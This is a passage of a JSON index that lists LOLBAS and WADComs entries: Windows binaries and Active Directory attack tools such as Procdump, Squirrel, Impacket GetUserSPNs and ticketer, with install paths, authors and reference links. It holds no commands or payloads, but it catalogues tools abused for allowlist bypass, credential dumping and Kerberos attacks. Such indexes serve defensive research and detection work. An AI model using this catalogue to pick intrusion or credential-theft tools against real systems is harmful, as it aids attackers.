@reegun21"],"references":["https://twitter.com/reegun21/status/1150032506504151040","https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Powerpnt/"],"count":1},{"id":"lolbas:procdump-exe","name":"Procdump.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":["Procdump64.exe"],"fullPath":["no default"],"author":"Alfie Champion (@ajpc500)","created":"2020-10-14T00:00:00.000Z","contributors":["Alfie Champion @ajpc500"],"references":["https://twitter.com/ajpc500/status/1448588362382778372?s=20","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Procdump/"],"count":2},{"id":"lolbas:protocolhandler-exe","name":"ProtocolHandler.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office16\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\ProtocolHandler.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\ProtocolHandler.exe","C:\\Program Files\\Microsoft Office\\Office15\\ProtocolHandler.exe"],"author":"Nir Chako","created":"2022-07-24T00:00:00.000Z","contributors":["Nir Chako (Pentera) @C_h4ck_0"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/ProtocolHandler/"],"count":1},{"id":"lolbas:rcsi-exe","name":"rcsi.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Matt Nelson @enigma0x3"],"references":["https://enigma0x3.net/2016/11/21/bypassing-application-whitelisting-by-using-rcsi-exe/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/rcsi/"],"count":2},{"id":"lolbas:remote-exe","name":"Remote.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\remote.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\remote.exe"],"author":"mr.d0x","created":"2021-06-01T00:00:00.000Z","contributors":["mr.d0x @mrd0x"],"references":["https://blog.thecybersecuritytutor.com/Exeuction-AWL-Bypass-Remote-exe-LOLBin/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Remote/"],"count":3},{"id":"lolbas:sqldumper-exe","name":"Sqldumper.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe","C:\\Program Files\\Microsoft Power BI Desktop\\bin\\SqlDumper.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Luis Rocha @countuponsec"],"references":["https://twitter.com/countuponsec/status/910969424215232518","https://twitter.com/countuponsec/status/910977826853068800","https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/"],"count":2},{"id":"lolbas:sqlps-exe","name":"Sqlps.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\100\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\110\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\sqlps.exe","C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe","C:\\Program Files (x86)\\Microsoft SQL Server\\150\\Tools\\Binn\\SQLPS.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Bryon @bryon_","Manny @ManuelBerrueta"],"references":["https://twitter.com/ManuelBerrueta/status/1527289261350760455","https://twitter.com/bryon_/status/975835709587075072","https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqlps/"],"count":1},{"id":"lolbas:sqltoolsps-exe","name":"SQLToolsPS.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://twitter.com/pabraeken/status/993298228840992768","https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017","https://lolbas-project.github.io/lolbas/OtherMSBinaries/SQLToolsPS/"],"count":1},{"id":"lolbas:squirrel-exe","name":"Squirrel.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Squirrel.exe"],"author":"Reegun J (OCBC Bank) - @reegun21","created":"2019-06-26T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21","Adam @Hexacorn"],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Squirrel/"],"count":5},{"id":"lolbas:te-exe","name":"te.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Giuseppe N3mes1s @gN3mes1s","Avihay Eldad @AvihayEldad"],"references":["https://twitter.com/gn3mes1s/status/927680266390384640","https://github.com/LOLBAS-Project/LOLBAS/pull/359","https://learn.microsoft.com/en-us/windows-hardware/drivers/taef/authoring-tests","https://lolbas-project.github.io/lolbas/OtherMSBinaries/te/"],"count":2},{"id":"lolbas:teams-exe","name":"Teams.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"],"author":"Andrew Kisliakov","created":"2022-01-17T00:00:00.000Z","contributors":["Andrew Kisliakov","mr.d0x @mrd0x"],"references":["https://l--k.uk/2022/01/16/microsoft-teams-and-other-electron-apps-as-lolbins/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Teams/"],"count":3},{"id":"lolbas:testwindowremoteagent-exe","name":"TestWindowRemoteAgent.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\RemoteAgent\\TestWindowRemoteAgent.exe"],"author":"Onat Uzunyayla","created":"2023-08-21T00:00:00.000Z","contributors":["Onat Uzunyayla"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/TestWindowRemoteAgent/"],"count":1},{"id":"lolbas:tracker-exe","name":"Tracker.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["no default"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Casey Smith @subTee"],"references":["https://twitter.com/subTee/status/793151392185589760","https://attack.mitre.org/wiki/Execution","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Tracker/"],"count":2},{"id":"lolbas:update-exe","name":"Update.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Microsoft\\Teams\\update.exe"],"author":"Oddvar Moe","created":"2019-06-26T00:00:00.000Z","contributors":["Reegun Richard Jayapaul (SpiderLabs, Trustwave) @reegun21","Mr.Un1k0d3r @MrUn1k0d3r","Adam @Hexacorn","Jesus Galvez"],"references":["https://www.youtube.com/watch?v=rOP3hnkj7ls","https://twitter.com/reegun21/status/1144182772623269889","https://twitter.com/MrUn1k0d3r/status/1143928885211537408","https://twitter.com/reegun21/status/1291005287034281990","http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/","https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12","https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56","https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/microsoft-teams-updater-living-off-the-land/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Update/"],"count":13},{"id":"lolbas:vsdiagnostics-exe","name":"VSDiagnostics.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe"],"author":"Bobby Cooke","created":"2023-07-12T00:00:00.000Z","contributors":["Bobby Cooke @0xBoku"],"references":["https://twitter.com/0xBoku/status/1679200664013135872","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSDiagnostics/"],"count":2},{"id":"lolbas:vsiisexelauncher-exe","name":"VSIISExeLauncher.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Community\\Common7\\IDE\\Extensions\\Microsoft\\Web Tools\\ProjectSystem\\VSIISExeLauncher.exe"],"author":"timwhite","created":"2021-09-24T00:00:00.000Z","contributors":["timwhite"],"references":["https://github.com/timwhitez","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSIISExeLauncher/"],"count":1},{"id":"lolbas:visio-exe","name":"Visio.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\Office16\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\Visio.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\Visio.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\Visio.exe"],"author":"Avihay Eldad","created":"2024-02-15T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/Visio/"],"count":1},{"id":"lolbas:visualuiaverifynative-exe","name":"VisualUiaVerifyNative.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\arm64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\UIAVerify\\VisualUiaVerifyNative.exe","c:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\UIAVerify\\VisualUiaVerifyNative.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Lee Christensen @tifkin","Jimmy @bohops"],"references":["https://bohops.com/2020/10/15/exploring-the-wdac-microsoft-recommended-block-rules-visualuiaverifynative/","https://github.com/MicrosoftDocs/windows-itpro-docs/commit/937db704b9148e9cee7c7010cad4d00ce9c4fdad","https://lolbas-project.github.io/lolbas/OtherMSBinaries/VisualUiaVerifyNative/"],"count":1},{"id":"lolbas:vslaunchbrowser-exe","name":"VSLaunchBrowser.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\<version>\\Community\\Common7\\IDE\\VSLaunchBrowser.exe"],"author":"Avihay Eldad","created":"2024-04-12T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/VSLaunchBrowser/"],"count":3},{"id":"lolbas:vshadow-exe","name":"Vshadow.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\bin\\<version>\\x64\\vshadow.exe"],"author":"Ayberk Halaç","created":"2023-09-06T00:00:00.000Z","contributors":["Ayberk Halaç"],"references":["https://learn.microsoft.com/en-us/windows/win32/vss/vshadow-tool-and-sample","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vshadow/"],"count":1},{"id":"lolbas:vsjitdebugger-exe","name":"vsjitdebugger.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\windows\\system32\\vsjitdebugger.exe"],"author":"Oddvar Moe","created":"2018-05-25T00:00:00.000Z","contributors":["Pierre-Alexandre Braeken @pabraeken"],"references":["https://twitter.com/pabraeken/status/990758590020452353","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsjitdebugger/"],"count":1},{"id":"lolbas:wfmformat-exe","name":"WFMFormat.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\there\\is\\no\\default\\installation\\path\\WFMFormat.exe"],"author":"Tim Baker","created":"2024-12-05T00:00:00.000Z","contributors":["Tim Baker (https://www.dotsec.com)"],"references":["https://www.microsoft.com/en-us/download/details.aspx?id=103244","https://lolbas-project.github.io/lolbas/OtherMSBinaries/WFMFormat/"],"count":1},{"id":"lolbas:wfc-exe","name":"Wfc.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\v10.0A\\bin\\NETFX 4.8 Tools\\wfc.exe"],"author":"Jimmy (@bohops)","created":"2021-09-26T00:00:00.000Z","contributors":["Matt Graeber @mattifestation","Jimmy @bohops"],"references":["https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wfc/"],"count":1},{"id":"lolbas:windbg-exe","name":"WinDbg.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x64\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\x86\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm\\windbg.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Debuggers\\arm64\\windbg.exe"],"author":"Avihay Eldad","created":"2025-07-16T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://learn.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-command-line-options","https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinDbg/"],"count":1},{"id":"lolbas:winproj-exe","name":"WinProj.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\Office16\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office14\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office15\\WinProj.exe","C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\WinProj.exe","C:\\Program Files\\Microsoft Office\\root\\Office16\\WinProj.exe"],"author":"Avihay Eldad","created":"2024-02-14T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/WinProj/"],"count":1},{"id":"lolbas:winword-exe","name":"Winword.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Office\\root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 16\\ClientX86\\Root\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office 16\\ClientX64\\Root\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files\\Microsoft Office\\Office16\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 15\\ClientX86\\Root\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office 15\\ClientX64\\Root\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files\\Microsoft Office\\Office15\\winword.exe","C:\\Program Files (x86)\\Microsoft Office 14\\ClientX86\\Root\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office 14\\ClientX64\\Root\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files\\Microsoft Office\\Office14\\winword.exe","C:\\Program Files (x86)\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe","C:\\Program Files\\Microsoft Office\\Office12\\winword.exe"],"author":"Reegun J (OCBC Bank)","created":"2019-07-19T00:00:00.000Z","contributors":["Reegun J (OCBC Bank) @reegun21"],"references":["https://twitter.com/reegun21/status/1150032506504151040","https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Winword/"],"count":1},{"id":"lolbas:wsb-exe","name":"wsb.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<user>\\AppData\\Local\\Microsoft\\WindowsApps\\wsb.exe"],"author":"Konrad 'unrooted' Klawikowski","created":"2026-05-28T00:00:00.000Z","contributors":["Konrad 'unrooted' Klawikowski","Lloyd Davies @LloydLabs"],"references":["https://web.archive.org/web/20250116184008/http://blog.syscall.party/2020/12/02/weaponizing-windows-sandbox.html","https://github.com/LloydLabs/wsb-detect","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-cli","https://learn.microsoft.com/windows/security/application-security/application-isolation/windows-sandbox/windows-sandbox-versions","https://github.com/secdev02/SandBoxShenanigans","https://lolbas-project.github.io/lolbas/OtherMSBinaries/wsb/"],"count":3},{"id":"lolbas:wsl-exe","name":"Wsl.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\wsl.exe"],"author":"Matthew Brown","created":"2019-06-27T00:00:00.000Z","contributors":["Alex Ionescu @aionescu","Matt @NotoriousRebel1","Asif Matadar @d1r4c","Nasreddine Bencherchali @nas_bench","Konrad 'unrooted' Klawikowski","Liran Ravich, CardinalOps"],"references":["https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules","https://twitter.com/nas_bench/status/1535431474429808642","https://cardinalops.com/blog/bash-and-switch-hijacking-via-windows-subsystem-for-linux/","https://lolbas-project.github.io/lolbas/OtherMSBinaries/Wsl/"],"count":5},{"id":"lolbas:xbootmgr-exe","name":"XBootMgr.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgr.exe"],"author":"Avihay Eldad","created":"2025-07-10T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad","Tommy Warren"],"references":["https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference","https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgr/"],"count":2},{"id":"lolbas:xbootmgrsleep-exe","name":"XBootMgrSleep.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe","C:\\Program Files (x86)\\Windows Kits\\10\\Windows Performance Toolkit\\xbootmgrsleep.exe"],"author":"Avihay Eldad","created":"2024-06-13T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad","Yuval Saban @yuvalsaban3"],"references":["https://learn.microsoft.com/en-us/previous-versions/windows/desktop/xperf/reference","https://lolbas-project.github.io/lolbas/OtherMSBinaries/XBootMgrSleep/"],"count":1},{"id":"lolbas:devtunnel-exe","name":"devtunnel.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<username>\\AppData\\Local\\Temp\\.net\\devtunnel\\devtunnel.exe","C:\\Users\\<username>\\AppData\\Local\\Temp\\DevTunnels\\devtunnel.exe"],"author":"Kamran Saifullah","created":"2023-09-16T00:00:00.000Z","contributors":["Kamran Saifullah @deFr0ggy"],"references":["https://code.visualstudio.com/docs/editor/port-forwarding","https://lolbas-project.github.io/lolbas/OtherMSBinaries/devtunnel/"],"count":1},{"id":"lolbas:dotnet-counters-exe","name":"dotnet-counters.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-counters.exe"],"author":"Iván Cabrera","created":"2026-08-27T00:00:00.000Z","contributors":["Iván Cabrera @ivancabrera02"],"references":["https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-counters","https://github.com/dotnet/diagnostics","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-counters/"],"count":1},{"id":"lolbas:dotnet-trace-exe","name":"dotnet-trace.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Users\\<user>\\.dotnet\\tools\\dotnet-trace.exe"],"author":"Iván Cabrera","created":"2026-08-27T00:00:00.000Z","contributors":["Iván Cabrera @ivancabrera02"],"references":["https://learn.microsoft.com/en-us/dotnet/core/diagnostics/dotnet-trace","https://github.com/dotnet/diagnostics","https://lolbas-project.github.io/lolbas/OtherMSBinaries/dotnet-trace/"],"count":1},{"id":"lolbas:vsls-agent-exe","name":"vsls-agent.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["c:\\Program Files (x86)\\Microsoft Visual Studio\\2019\\Professional\\Common7\\IDE\\Extensions\\Microsoft\\LiveShare\\Agent\\vsls-agent.exe"],"author":"Jimmy (@bohops)","created":"2022-11-01T00:00:00.000Z","contributors":["Jimmy @bohops"],"references":["https://twitter.com/bohops/status/1583916360404729857","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vsls-agent/"],"count":1},{"id":"lolbas:vstest-console-exe","name":"vstest.console.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe","C:\\Program Files (x86)\\Microsoft Visual Studio\\2022\\TestAgent\\Common7\\IDE\\CommonExtensions\\Microsoft\\TestWindow\\vstest.console.exe"],"author":"Onat Uzunyayla","created":"2023-09-08T00:00:00.000Z","contributors":["Onat Uzunyayla","Ayberk Halac"],"references":["https://learn.microsoft.com/en-us/visualstudio/test/vstest-console-options?view=vs-2022","https://lolbas-project.github.io/lolbas/OtherMSBinaries/vstest.console/"],"count":1},{"id":"lolbas:winfile-exe","name":"winfile.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Windows\\System32\\winfile.exe","C:\\Windows\\winfile.exe","C:\\Program Files\\WinFile\\winfile.exe","C:\\Program Files (x86)\\WinFile\\winfile.exe","C:\\Program Files\\WindowsApps\\Microsoft.WindowsFileManager_10.3.0.0_x64__8wekyb3d8bbwe\\WinFile\\winfile.exe"],"author":"Avihay Eldad","created":"2024-04-30T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://github.com/microsoft/winfile","https://lolbas-project.github.io/lolbas/OtherMSBinaries/winfile/"],"count":1},{"id":"lolbas:xsd-exe","name":"xsd.exe","source":"LOLBAS","platform":["Windows"],"toolType":"OtherMSBinary","aliases":[],"fullPath":["C:\\Program Files (x86)\\Microsoft SDKs\\Windows\\<version>\\bin\\NETFX <version> Tools\\xsd.exe"],"author":"Avihay Eldad","created":"2024-04-09T00:00:00.000Z","contributors":["Avihay Eldad @AvihayEldad"],"references":["https://lolbas-project.github.io/lolbas/OtherMSBinaries/xsd/"],"count":1},{"id":"wadcoms:ADCSEnumaration","name":"ADCSEnumaration","source":"WADComs","platform":["Windows"],"references":["https://github.com/GhostPack/Certify","https://posts.specterops.io/certified-pre-owned-d95910965cd2","https://www.thehacker.recipes/ad/movement/adcs/"],"count":1},{"id":"wadcoms:BloodHound.py","name":"BloodHound.py","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/BloodHoundAD/BloodHound","https://github.com/fox-it/BloodHound.py"],"count":2},{"id":"wadcoms:CredDumpWithoutMimilkatz","name":"CredDumpWithoutMimilkatz","source":"WADComs","platform":["Windows","Linux"],"references":["https://www.ired.team/offensive-security/credential-access-and-credential-dumping","https://www.synacktiv.com/en/publications/lsa-secrets-revisiting-secretsdump"],"count":1},{"id":"wadcoms:Dementor","name":"Dementor","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc","https://www.praetorian.com/blog/active-directory-computer-account-smb-relaying-attack"],"count":1},{"id":"wadcoms:Enum4Linux","name":"Enum4Linux","source":"WADComs","platform":["Linux","ActiveDirectory","Windows"],"references":["https://github.com/CiscoCXSecurity/enum4linux","https://github.com/cddmp/enum4linux-ng"],"count":3},{"id":"wadcoms:Evil","name":"Evil","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/Hackplayers/evil-winrm","https://book.hacktricks.xyz/cryptography/certificates"],"count":3},{"id":"wadcoms:FindUncommonShares","name":"FindUncommonShares","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/p0dalirius/FindUncommonShares"],"count":1},{"id":"wadcoms:Impacket-dcomexec","name":"Impacket-dcomexec","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/dcomexec.py","https://riccardoancarani.github.io/2020-05-10-hunting-for-impacket/"],"count":1},{"id":"wadcoms:Impacket-Get-GPPPassword","name":"Impacket-Get-GPPPassword","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/Get-GPPPassword.py","https://podalirius.net/en/articles/exploiting-windows-group-policy-preferences/"],"count":1},{"id":"wadcoms:Impacket-GetADUsers","name":"Impacket-GetADUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetADUsers.py"],"count":1},{"id":"wadcoms:Impacket-GetNPUsers","name":"Impacket-GetNPUsers","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetNPUsers.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/"],"count":1},{"id":"wadcoms:Impacket-GetUserSPNs","name":"Impacket-GetUserSPNs","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/GetUserSPNs.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/","https://github.com/fortra/impacket","https://swarm.ptsecurity.com/kerberoasting-without-spns/","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/kerberoast"],"count":2},{"id":"wadcoms:Impacket-ticketer","name":"Impacket-ticketer","source":"WADComs","platform":["Linux","Windows","ActiveDirectory"],"references":["https://github.com/SecureAuthCorp/impacket/blob/master/examples/ticketer.py","https://www.tarlogic.com/en/blog/how-to-attack-kerberos/","https://github.com/fortra/impacket","https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/golden-ticket","https://attack.mitre.org/techniques/T1558/001/"],"count":3},{"id":"wadcoms:Impacket-lookupsid","name":"Impacke